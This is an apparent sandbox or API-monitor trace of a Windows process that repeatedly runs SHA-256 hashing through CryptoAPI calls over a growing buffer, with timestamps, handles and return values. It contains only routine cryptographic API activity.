	[0201.715] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.715] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x620, dwFlags=0x0) returned 1
	[0201.715] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.715] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693c60
	[0201.715] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2693c60, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693c60, pdwDataLen=0x129424) returned 1
	[0201.715] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.715] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.715] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.715] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.715] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x640, dwFlags=0x0) returned 1
	[0201.715] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.715] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693c88
	[0201.715] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x2693c88, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693c88, pdwDataLen=0x129424) returned 1
	[0201.716] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.716] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.716] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.716] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.716] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x660, dwFlags=0x0) returned 1
	[0201.716] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.716] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693cb0
	[0201.716] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2693cb0, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693cb0, pdwDataLen=0x129424) returned 1
	[0201.716] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.716] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.716] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.716] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.716] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x680, dwFlags=0x0) returned 1
	[0201.716] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.716] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693cd8
	[0201.717] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x2693cd8, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693cd8, pdwDataLen=0x129424) returned 1
	[0201.717] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.717] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.717] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.717] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.717] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x6a0, dwFlags=0x0) returned 1
	[0201.717] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.717] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693d00
	[0201.717] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2693d00, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693d00, pdwDataLen=0x129424) returned 1
	[0201.717] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.717] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.717] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.717] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.717] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x6c0, dwFlags=0x0) returned 1
	[0201.718] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.718] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693d28
	[0201.718] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x2693d28, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693d28, pdwDataLen=0x129424) returned 1
	[0201.718] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.718] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.718] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.718] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.718] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x6e0, dwFlags=0x0) returned 1
	[0201.718] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.718] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693d50
	[0201.718] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2693d50, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693d50, pdwDataLen=0x129424) returned 1
	[0201.718] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.718] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.718] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.718] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.718] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x700, dwFlags=0x0) returned 1
	[0201.718] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.719] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693d78
	[0201.719] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x2693d78, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693d78, pdwDataLen=0x129424) returned 1
	[0201.719] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.719] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.719] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.719] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.719] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x720, dwFlags=0x0) returned 1
	[0201.719] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.719] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693da0
	[0201.719] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2693da0, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693da0, pdwDataLen=0x129424) returned 1
	[0201.719] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.719] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.719] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.719] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.719] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x740, dwFlags=0x0) returned 1
	[0201.719] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.720] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693dc8
	[0201.720] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x2693dc8, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693dc8, pdwDataLen=0x129424) returned 1
	[0201.720] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.720] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.720] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.720] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.720] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x760, dwFlags=0x0) returned 1
	[0201.720] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.720] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693df0
	[0201.720] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2693df0, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693df0, pdwDataLen=0x129424) returned 1
	[0201.720] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.720] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.720] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.720] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.720] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x780, dwFlags=0x0) returned 1
	[0201.721] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.721] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693e18
	[0201.721] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x2693e18, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693e18, pdwDataLen=0x129424) returned 1
	[0201.721] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.721] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.721] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.721] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.721] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x7a0, dwFlags=0x0) returned 1
	[0201.721] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.721] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693e40
	[0201.721] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2693e40, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693e40, pdwDataLen=0x129424) returned 1
	[0201.722] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.722] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.722] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.722] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.722] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x7c0, dwFlags=0x0) returned 1
	[0201.722] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.722] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693e68
	[0201.722] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x2693e68, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693e68, pdwDataLen=0x129424) returned 1
	[0201.722] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.722] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.722] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.722] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.722] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x7e0, dwFlags=0x0) returned 1
	[0201.722] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.723] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693e90
	[0201.723] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2693e90, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693e90, pdwDataLen=0x129424) returned 1
	[0201.723] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.723] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.723] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.723] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.723] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x800, dwFlags=0x0) returned 1
	[0201.723] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.723] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693eb8
	[0201.723] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x2693eb8, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693eb8, pdwDataLen=0x129424) returned 1
	[0201.723] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.723] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.723] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.724] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.724] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x820, dwFlags=0x0) returned 1
	[0201.724] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.724] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693ee0
	[0201.724] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2693ee0, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693ee0, pdwDataLen=0x129424) returned 1
	[0201.724] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.724] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.724] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.724] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.724] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x840, dwFlags=0x0) returned 1
	[0201.724] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.724] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693f08
	[0201.724] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x2693f08, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693f08, pdwDataLen=0x129424) returned 1
	[0201.724] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.724] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.724] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.725] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.725] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x860, dwFlags=0x0) returned 1
	[0201.725] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.725] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693f30
	[0201.725] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2693f30, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693f30, pdwDataLen=0x129424) returned 1
	[0201.725] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.725] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.725] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.725] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.725] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x880, dwFlags=0x0) returned 1
	[0201.725] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.725] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693f58
	[0201.725] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x2693f58, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693f58, pdwDataLen=0x129424) returned 1
	[0201.725] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.725] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.725] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.726] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.726] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x8a0, dwFlags=0x0) returned 1
	[0201.726] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.726] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693f80
	[0201.726] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2693f80, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693f80, pdwDataLen=0x129424) returned 1
	[0201.726] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.726] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.726] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.726] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.726] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x8c0, dwFlags=0x0) returned 1
	[0201.726] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.726] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693fa8
	[0201.726] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x2693fa8, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693fa8, pdwDataLen=0x129424) returned 1
	[0201.726] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.726] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.727] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.727] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.727] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x8e0, dwFlags=0x0) returned 1
	[0201.727] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.727] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693fd0
	[0201.727] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2693fd0, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693fd0, pdwDataLen=0x129424) returned 1
	[0201.727] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.727] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.727] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.727] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.727] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x900, dwFlags=0x0) returned 1
	[0201.727] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.727] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693ff8
	[0201.728] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x2693ff8, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693ff8, pdwDataLen=0x129424) returned 1
	[0201.728] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.728] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.728] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.728] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.728] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x920, dwFlags=0x0) returned 1
	[0201.728] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.728] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2694020
	[0201.728] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2694020, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2694020, pdwDataLen=0x129424) returned 1
	[0201.728] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.728] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.728] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.728] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.728] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x940, dwFlags=0x0) returned 1
	[0201.729] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.729] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310cd0
	[0201.729] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x2310cd0, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2310cd0, pdwDataLen=0x129424) returned 1
	[0201.729] CryptDestroyHash (hHash=0x22b6980) returned 1
